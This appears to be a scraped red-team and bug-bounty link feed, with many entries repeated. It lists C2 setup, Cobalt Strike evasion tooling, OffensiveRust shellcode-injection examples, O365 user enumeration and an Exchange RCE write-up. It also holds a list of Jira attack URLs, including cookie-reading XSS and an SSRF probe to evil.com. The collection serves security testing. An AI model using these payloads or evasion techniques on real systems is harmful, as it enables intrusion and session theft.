Taking the pain out of C2 Infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4
#c2 #redteam #infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4
#c2 #redteam #infrastructure
Substack
Taking the pain out of C2 Infrastructure (Part 1)
Caddy is good. Caddy is life.
InlineWhispers2
Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2
https://github.com/Sh0ckFR/InlineWhispers2
#cobaltstrike #BOF #syswhispers
Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2
https://github.com/Sh0ckFR/InlineWhispers2
#cobaltstrike #BOF #syswhispers
GitHub
GitHub - Sh0ckFR/InlineWhispers2: Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2
Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2 - Sh0ckFR/InlineWhispers2
DLL Hollowing
Deep dive into a stealthier DLL hollowing/memory allocation variant.
https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/
#malware #dll #hollowing
Deep dive into a stealthier DLL hollowing/memory allocation variant.
https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/
#malware #dll #hollowing
www.secforce.com
SECFORCE - Security without compromise
Cybersecurity consultancy specialized in offensive security helping top-tier organisations all over the world.
OffensiveRust — Rust Weaponization for Red Team Engagements.
Examples in this repo:
#rust #redteam #malware
Examples in this repo:
• Allocate_With_Syscalls — It uses NTDLL functions directly with the ntapi Libraryhttps://github.com/trickster0/OffensiveRust
• Create_DLL — Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
• DeviceIoControl — Opens driver handle and executing DeviceIoControl
• EnableDebugPrivileges — Enable SeDebugPrivilege in the current process
• Shellcode_Local_inject — Executes shellcode directly in local process by casting pointer
• Execute_With_CMD — Executes cmd by passing a command via Rust
• ImportedFunctionCall — It imports minidump from dbghelp and executes it
• Kernel_Driver_Exploit — Kernel Driver exploit for a simple buffer overflow
• Named_Pipe_Client — Named Pipe Client
• Named_Pipe_Server — Named Pipe Server
• Process_Injection_CreateThread — Process Injection in remote process with CreateRemoteThread
• Unhooking — Unhooking calls
• asm_syscall — Obtaining PEB address via asm
• base64_system_enum — Base64 encoding/decoding strings
• http-https-requests — HTTP/S requests by ignoring cert check for GET/POST
• patch_etw — Patch ETW
• ppid_spoof — Spoof parent process for created process
• tcp_ssl_client — TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
• tcp_ssl_server — TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
• wmi_execute — Executes WMI query to obtain the AV/EDRs in the host
• Windows.h+ Bindings — This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
• UUID_Shellcode_Execution — Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.
#rust #redteam #malware
GitHub
GitHub - trickster0/OffensiveRust: Rust Weaponization for Red Team Engagements.
Rust Weaponization for Red Team Engagements. Contribute to trickster0/OffensiveRust development by creating an account on GitHub.
Oh365 User Finder
Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to identify the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid.
https://github.com/dievus/Oh365UserFinder
#office365 #user #enumeration
Oh365UserFinder is used for identifying valid o365 accounts without the risk of account lockouts. The tool parses responses to identify the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid.
https://github.com/dievus/Oh365UserFinder
#office365 #user #enumeration
Default Passwords
Before performing password attacks, it is worth trying a couple of default passwords against the targeted service. Here are some website that provide default passwords for various products.
# https://cirt.net/passwords
# https://default-password.info/
# https://datarecovery.com/rd/default-passwords/
#default #passwords #services
Before performing password attacks, it is worth trying a couple of default passwords against the targeted service. Here are some website that provide default passwords for various products.
# https://cirt.net/passwords
# https://default-password.info/
# https://datarecovery.com/rd/default-passwords/
#default #passwords #services
Microsoft Exchange Deserialization RCE (CVE-2021–42321)
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
#exchange #rce #cve #deserialization
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
#exchange #rce #cve #deserialization
Medium
Some notes about Microsoft Exchange Deserialization RCE (CVE-2021–42321)
Vietnamese version: https://testbnull.medium.com/some-notes-of-microsoft-exchange-deserialization-rce-cve-2021-42321-f6750243cdcd
Atlassian Jira Payloads
/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/ViewUserHover.jspa?username=Admin
/rest/api/2/dashboard?maxResults=100
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
/rest/api/2/user/picker?query=admin
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/secure/ContactAdministrators!default.jspa
#bugbounty #jira #payloadsGPUSleep
Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep.
# https://github.com/oXis/GPUSleep
# https://oxis.github.io/GPUSleep/
#redteam #gpu #sleep #beacon
Small project of mine that is designed to move Cobalt Strike (or any really) beacon image, and heap, from memory to GPU memory before going to sleep. And moves everything back at the same place after sleep.
# https://github.com/oXis/GPUSleep
# https://oxis.github.io/GPUSleep/
#redteam #gpu #sleep #beacon
GitHub
GitHub - oXis/GPUSleep: Move CS beacon to GPU memory when sleeping
Move CS beacon to GPU memory when sleeping. Contribute to oXis/GPUSleep development by creating an account on GitHub.
Windows Privileges
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
https://speakerdeck.com/fr0gger/windows-privileges
#windows #privileges #cheatsheet
Cloudmare
Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS.
https://github.com/MrH0wl/Cloudmare
#bugbounty #cloudflare #tracker #ip
Cloudmare is a simple tool to find origin servers of websites protected by Cloudflare, Sucuri or Incapsula with a misconfiguration DNS.
https://github.com/MrH0wl/Cloudmare
#bugbounty #cloudflare #tracker #ip